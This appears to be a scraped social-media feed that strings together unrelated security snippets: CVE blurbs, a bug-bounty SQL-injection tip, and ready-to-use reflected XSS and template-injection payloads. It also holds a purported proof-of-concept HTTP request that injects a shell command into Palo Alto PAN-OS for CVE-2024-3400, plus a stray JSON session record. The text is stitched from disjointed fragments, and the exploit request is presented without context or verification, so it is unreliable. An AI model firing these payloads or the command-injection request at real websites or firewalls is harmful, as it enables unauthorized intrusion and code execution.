John Althouse’s Post

The flaw, tracked as CVE-2021-38305 (CVSS score: 7.8), involves manipulating the schema file provided as input to the tool to circumvent protections and achieve code execution. https://cstu.io/470ef4

🚨 #SQLi Tip 🚨 👉🏼 Credit @0xTib3rius If your input causes a server error (e.g. 500) when you inject a ' (for example) but you don't get reliable results using boolean inferential injections, try these payloads which should trigger the 500 when the red condition is true. #bugbounty #bugbountytip #bugbountytips #bughunter

can try it to get bounty in rxss😉 https://xyz/xx/xx/?q=abc`;return false});});alert`xss`;</script> or using encoding https://xyz/xx/xx/?q=abc%60%3Breturn%20false%7D)%3B%7D)%3Balert%60xss%60%3B%3C%2Fscript%3E

This payload can be used for Client Side Template injection and Reflected XSS, perhaps a code injection can be triggered in the background Payload : '%3e%3cscript%3ealert(5*5)%3c%2fscript%3eejj4sbx5w4o #bugbountytips #BugBounty #payload

The "ls *.c" command allows us to list all files with the extension ".c" The "ls" command already allows us to list the number of files in a directory. We use the * to tell it to list ALL the files, and the ".c" is the extension.

"I applied all of the patches" - The patches:

#Paloalto CVE-2024-3400 POC POST /api/ HTTP/1.1 Host: <IP> User-Agent: PAN-OS-Exploit Content-Type: application/xml Content-Length: 140 data=<?xml version="1.0" encoding="UTF-8"?> <request> <op cmd="test" /> <cmd code="ping">ls -la</cmd> </request>

Oops implementation of automated system - depends on the competence of the person doing it - SJS !! So we live and learn.

https://lnkd.in/gdKUAxHT CVE-2022-42889: Apache Commons Text prior to 1.10.0 allows RCE when applied to untrusted input due to insecure interpolation defaults

{ "sessionId": "cc9e3b9565434be0b8dc285c2dcbc5bc", "uniqueId": "143bf9a425ff462bbb2a8dc5b04ba3e1", "qrCodeType": "LOGIN_AND_PAY", "header": { "statusCode": 200, "errors": null, "errorParameters": null } }